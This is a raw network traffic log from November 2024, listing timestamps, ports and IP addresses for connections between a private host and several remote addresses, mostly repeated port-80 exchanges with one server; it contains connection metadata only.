Nov 23, 2024 07:09:43.923692942 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.923775911 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.924750090 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.924797058 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.924856901 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.924900055 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.925892115 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.925944090 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.926002026 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.926043034 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.927016973 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.927128077 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.927181959 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.928169012 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.928261995 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.928278923 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.928312063 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.929310083 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.929403067 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.929446936 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.929469109 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.930434942 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.930491924 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.930520058 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.930557966 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.931575060 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.931638002 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.931679964 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.931746006 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.932817936 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.932872057 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.932904005 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.932944059 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.933864117 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.933917046 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.933984041 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.934161901 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.935007095 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.935060978 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.935101032 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.935142994 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.936146975 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.936244011 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.936254025 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.936294079 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.937257051 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.937325954 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.937366009 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.937449932 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.938410044 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.938484907 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.938522100 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.938563108 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.939560890 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.939605951 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.939646006 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.939690113 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.940674067 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.940726995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.940764904 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.940804005 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.941807985 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.941876888 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.941911936 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.942007065 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.942534924 CET	49877	443	192.168.2.6	23.209.72.40
Nov 23, 2024 07:09:43.942543030 CET	443	49877	23.209.72.40	192.168.2.6
Nov 23, 2024 07:09:43.942548037 CET	49874	443	192.168.2.6	2.16.158.35
Nov 23, 2024 07:09:43.942560911 CET	443	49874	2.16.158.35	192.168.2.6
Nov 23, 2024 07:09:43.942962885 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.943018913 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.943059921 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.943581104 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.944109917 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.944184065 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.944205046 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.944247961 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.945255041 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.945319891 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.945322037 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.945463896 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.946419001 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.946527004 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.946547985 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.946567059 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.947536945 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.947585106 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.947645903 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.947776079 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.948673010 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.948746920 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.948781013 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.948818922 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.949779987 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.949865103 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.949878931 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.949925900 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.950937986 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.950984001 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.951018095 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.951056957 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.952070951 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.952125072 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.952163935 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.952204943 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.953186035 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.953290939 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.953321934 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.953321934 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.954344988 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.954387903 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.954448938 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.954541922 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.955444098 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.955487013 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.074532986 CET	443	49870	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:44.074630976 CET	443	49870	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:44.074640036 CET	49870	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:44.074693918 CET	49870	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:44.074800014 CET	49870	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:44.074817896 CET	443	49870	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:44.074827909 CET	49870	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:44.074867964 CET	49870	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:44.100315094 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.100332975 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.100413084 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.100438118 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.100480080 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.100619078 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.100852013 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.101500034 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.101558924 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.101681948 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.101731062 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.102693081 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.102750063 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.102832079 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.102982998 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.105441093 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.105456114 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.105473042 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.105508089 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.105524063 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.105593920 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.105633974 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.106113911 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.106159925 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.106304884 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.106350899 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.107341051 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.107357979 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.107415915 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.108541965 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.108557940 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.108611107 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.115799904 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.115817070 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.115839005 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.115854025 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.115869045 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.115876913 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.115884066 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.115900040 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.115923882 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.115926981 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.115942955 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.115945101 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.115958929 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.115971088 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.115983009 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.115989923 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.115997076 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.115998983 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.116014957 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.116024017 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.116036892 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.116038084 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.116055012 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.116059065 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.116071939 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.116080046 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.116086960 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.116096973 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.116106033 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.116111040 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.116130114 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.116147041 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.117187023 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.117233992 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.117355108 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.117585897 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.118455887 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.118473053 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.118530035 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.118555069 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.119509935 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.119647026 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.119683981 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.119726896 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.120553017 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.120649099 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.120863914 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.120908022 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.121602058 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.121669054 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.121762037 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.121809006 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.122834921 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.123003006 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.123032093 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.123047113 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.123946905 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.124011040 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.124102116 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.124147892 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.125145912 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.125193119 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.125341892 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.125406981 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.126414061 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.126430988 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.126463890 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.126475096 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.130230904 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.130248070 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.130280018 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.130304098 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.130362988 CET	49877	443	192.168.2.6	23.209.72.40
Nov 23, 2024 07:09:44.130373955 CET	49874	443	192.168.2.6	2.16.158.35
Nov 23, 2024 07:09:44.131102085 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.131145000 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.131293058 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.131337881 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.132180929 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.132229090 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.132361889 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.132438898 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.133445978 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.133493900 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.180464029 CET	443	49881	23.44.201.5	192.168.2.6
Nov 23, 2024 07:09:44.181267023 CET	49881	443	192.168.2.6	23.44.201.5
Nov 23, 2024 07:09:44.181286097 CET	443	49881	23.44.201.5	192.168.2.6
Nov 23, 2024 07:09:44.182321072 CET	443	49881	23.44.201.5	192.168.2.6
Nov 23, 2024 07:09:44.182384968 CET	49881	443	192.168.2.6	23.44.201.5
Nov 23, 2024 07:09:44.186386108 CET	49881	443	192.168.2.6	23.44.201.5
Nov 23, 2024 07:09:44.186458111 CET	443	49881	23.44.201.5	192.168.2.6
Nov 23, 2024 07:09:44.188060045 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.207933903 CET	49888	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.207982063 CET	443	49888	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.208112955 CET	49889	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.208151102 CET	443	49889	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.208153009 CET	49888	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.208190918 CET	49889	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.208535910 CET	49890	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.208547115 CET	443	49890	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.208645105 CET	49890	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.208828926 CET	49891	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.208838940 CET	443	49891	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.208901882 CET	49891	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.209090948 CET	49892	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.209146023 CET	443	49892	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.209203005 CET	49892	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.209505081 CET	49893	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.209536076 CET	443	49893	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.209583998 CET	49893	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.209727049 CET	49888	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.209748983 CET	443	49888	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.210006952 CET	49889	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.210021973 CET	443	49889	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.210216999 CET	49890	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.210228920 CET	443	49890	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.210386992 CET	49891	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.210398912 CET	443	49891	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.210592985 CET	49892	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.210621119 CET	443	49892	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.210969925 CET	49893	443	192.168.2.6	13.107.246.40
Nov 23, 2024 07:09:44.210990906 CET	443	49893	13.107.246.40	192.168.2.6
Nov 23, 2024 07:09:44.283226013 CET	49881	443	192.168.2.6	23.44.201.5
Nov 23, 2024 07:09:44.283240080 CET	443	49881	23.44.201.5	192.168.2.6
Nov 23, 2024 07:09:44.307821035 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.364463091 CET	443	49880	18.238.49.124	192.168.2.6
Nov 23, 2024 07:09:44.365187883 CET	49880	443	192.168.2.6	18.238.49.124
Nov 23, 2024 07:09:44.365235090 CET	443	49880	18.238.49.124	192.168.2.6
Nov 23, 2024 07:09:44.366297007 CET	443	49880	18.238.49.124	192.168.2.6
Nov 23, 2024 07:09:44.366369963 CET	49880	443	192.168.2.6	18.238.49.124
Nov 23, 2024 07:09:44.367371082 CET	49880	443	192.168.2.6	18.238.49.124
Nov 23, 2024 07:09:44.367454052 CET	443	49880	18.238.49.124	192.168.2.6
Nov 23, 2024 07:09:44.488267899 CET	49881	443	192.168.2.6	23.44.201.5
Nov 23, 2024 07:09:44.488655090 CET	49880	443	192.168.2.6	18.238.49.124
Nov 23, 2024 07:09:44.488699913 CET	443	49880	18.238.49.124	192.168.2.6
Nov 23, 2024 07:09:44.489535093 CET	443	49882	104.117.182.56	192.168.2.6
Nov 23, 2024 07:09:44.490684986 CET	49882	443	192.168.2.6	104.117.182.56
Nov 23, 2024 07:09:44.490720034 CET	443	49882	104.117.182.56	192.168.2.6
Nov 23, 2024 07:09:44.491836071 CET	443	49882	104.117.182.56	192.168.2.6
Nov 23, 2024 07:09:44.491893053 CET	49882	443	192.168.2.6	104.117.182.56
Nov 23, 2024 07:09:44.492850065 CET	49882	443	192.168.2.6	104.117.182.56
Nov 23, 2024 07:09:44.492940903 CET	443	49882	104.117.182.56	192.168.2.6
Nov 23, 2024 07:09:44.534650087 CET	49882	443	192.168.2.6	104.117.182.56
Nov 23, 2024 07:09:44.534677982 CET	443	49882	104.117.182.56	192.168.2.6
Nov 23, 2024 07:09:44.633769035 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.633783102 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.633833885 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.633866072 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.634038925 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.634080887 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.634246111 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.634478092 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.635220051 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.635274887 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.635296106 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.635350943 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.636293888 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.636357069 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.636387110 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.636426926 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.637449026 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.637501001 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.637547016 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.637590885 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.638607025 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.638659000 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.638755083 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.638803959 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.639734983 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.639749050 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.639787912 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.640889883 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.640949011 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.640954018 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.640997887 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.641971111 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.642034054 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.642067909 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.642110109 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.643117905 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.643163919 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.643194914 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.643446922 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:44.644273043 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:44.644321918 CET	49817	80	192.168.2.6	185.215.113.206
